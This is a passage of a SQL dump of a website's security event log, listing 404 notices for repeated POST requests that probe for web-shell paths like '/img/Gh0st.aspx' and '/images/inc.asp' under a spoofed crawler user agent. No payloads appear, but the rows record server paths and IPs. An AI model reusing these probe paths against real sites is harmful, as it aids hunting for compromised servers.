http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"125.67.64.16\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"125.67.64.16\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/images/inc.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/images/inc.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayLHQNyE4PJlyugCritLQAAAJE\";s:12:\"REDIRECT_URL\";s:15:\"/images/inc.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"61411\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/images/inc.asp\";s:10:\"SCRIPT_URL\";s:15:\"/images/inc.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayLHQNyE4PJlyugCritLQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571588893.742\";s:12:\"REQUEST_TIME\";s:10:\"1571588893\";}}','notice','2019-10-20 16:28:16','2019-10-20 16:28:14',35663712,37471712,'http://bintara.com.my//images/inc.asp',1,0,'125.67.64.16'),(28501,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//config/layout.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.200.98.122\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.200.98.122\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/config/layout.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/config/layout.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayL3Zd0uitCPf4ohr-kBgAAAVU\";s:12:\"REDIRECT_URL\";s:18:\"/config/layout.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50161\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/config/layout.asp\";s:10:\"SCRIPT_URL\";s:18:\"/config/layout.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayL3Zd0uitCPf4ohr-kBgAAAVU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589085.5158\";s:12:\"REQUEST_TIME\";s:10:\"1571589085\";}}','notice','2019-10-20 16:31:27','2019-10-20 16:31:25',35340696,37141904,'http://bintara.com.my//config/layout.asp',1,0,'220.200.98.122'),(28502,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//config/layout.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"211.95.189.214\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"211.95.189.214\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/config/layout.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/config/layout.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayL5Jd0uitCPf4ohr-kCgAAAUc\";s:12:\"REDIRECT_URL\";s:18:\"/config/layout.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50161\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/config/layout.asp\";s:10:\"SCRIPT_URL\";s:18:\"/config/layout.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayL5Jd0uitCPf4ohr-kCgAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:13:\"1571589092.58\";s:12:\"REQUEST_TIME\";s:10:\"1571589092\";}}','notice','2019-10-20 16:31:34','2019-10-20 16:31:32',35269008,37069512,'http://bintara.com.my//config/layout.asp',1,0,'211.95.189.214'),(28503,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//qpmd/flash.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"58.198.155.74\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"58.198.155.74\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/qpmd/flash.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/qpmd/flash.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayL8cpDb2HpNZKJEUbccAAAAAY\";s:12:\"REDIRECT_URL\";s:15:\"/qpmd/flash.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"50632\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/qpmd/flash.asp\";s:10:\"SCRIPT_URL\";s:15:\"/qpmd/flash.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayL8cpDb2HpNZKJEUbccAAAAAY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589105.7532\";s:12:\"REQUEST_TIME\";s:10:\"1571589105\";}}','notice','2019-10-20 16:31:47','2019-10-20 16:31:46',35268312,37067368,'http://bintara.com.my//qpmd/flash.asp',1,0,'58.198.155.74'),(28504,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//plus/index.php\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"117.39.115.122\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"117.39.115.122\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/plus/index.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/index.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMIpd0uitCPf4ohr-kJQAAAUc\";s:12:\"REDIRECT_URL\";s:15:\"/plus/index.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"51870\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/plus/index.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/index.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMIpd0uitCPf4ohr-kJQAAAUc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589154.1811\";s:12:\"REQUEST_TIME\";s:10:\"1571589154\";}}','notice','2019-10-20 16:32:36','2019-10-20 16:32:34',35268144,37063720,'http://bintara.com.my//plus/index.php',1,0,'117.39.115.122'),(28505,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//img/Gh0st.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:15:\"211.136.175.101\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"211.136.175.101\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/img/Gh0st.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/img/Gh0st.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMS40ygb@uBJr9fsz-uwAAAQI\";s:12:\"REDIRECT_URL\";s:15:\"/img/Gh0st.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"52852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/img/Gh0st.aspx\";s:10:\"SCRIPT_URL\";s:15:\"/img/Gh0st.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMS40ygb@uBJr9fsz-uwAAAQI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571589195.386\";s:12:\"REQUEST_TIME\";s:10:\"1571589195\";}}','notice','2019-10-20 16:33:17','2019-10-20 16:33:15',35341496,37148568,'http://bintara.com.my//img/Gh0st.aspx',1,0,'211.136.175.101'),(28506,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//img/Gh0st.aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"124.92.2.118\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"124.92.2.118\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/img/Gh0st.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/img/Gh0st.aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMWJd0uitCPf4ohr-kSAAAAVY\";s:12:\"REDIRECT_URL\";s:15:\"/img/Gh0st.aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53211\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/img/Gh0st.aspx\";s:10:\"SCRIPT_URL\";s:15:\"/img/Gh0st.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMWJd0uitCPf4ohr-kSAAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571589208.483\";s:12:\"REQUEST_TIME\";s:10:\"1571589208\";}}','notice','2019-10-20 16:33:30','2019-10-20 16:33:28',35269424,37069000,'http://bintara.com.my//img/Gh0st.aspx',1,0,'124.92.2.118'),(28507,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"//images/Thumb.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"817\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"122.13.36.102\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"122.13.36.102\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMY40ygb@uBJr9fsz-vgAAAQE\";s:12:\"REDIRECT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53483\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"http://bintara.com.my/images/Thumb.asp\";s:10:\"SCRIPT_URL\";s:17:\"/images/Thumb.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMY40ygb@uBJr9fsz-vgAAAQE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589219.7385\";s:12:\"REQUEST_TIME\";s:10:\"1571589219\";}}','notice','2019-10-20 16:33:42','2019-10-20 16:33:40',35340456,37149656,'http://bintara.com.my//images/Thumb.asp',1,0,'122.13.36.102'),(28508,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/Index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"296\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"219.72.110.46\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"219.72.110.46\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XayMf5d0uitCPf4ohr-kXgAAAVg\";s:12:\"REDIRECT_URL\";s:18:\"/images/Index.ashx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53973\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/images/Index.ashx\";s:10:\"SCRIPT_URL\";s:18:\"/images/Index.ashx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"XayMf5d0uitCPf4ohr-kXgAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571589247.6026\";s:12:\"REQUEST_TIME\";s:10:\"1571589247\";}}','notice','2019-10-20 16:34:09','2019-10-20 16:34:07',35266080,37060792,'http://bintara.com.my//images/Index.ashx',1,0,'219.72.110.46'),(28509,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"//images/Index.ashx\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; 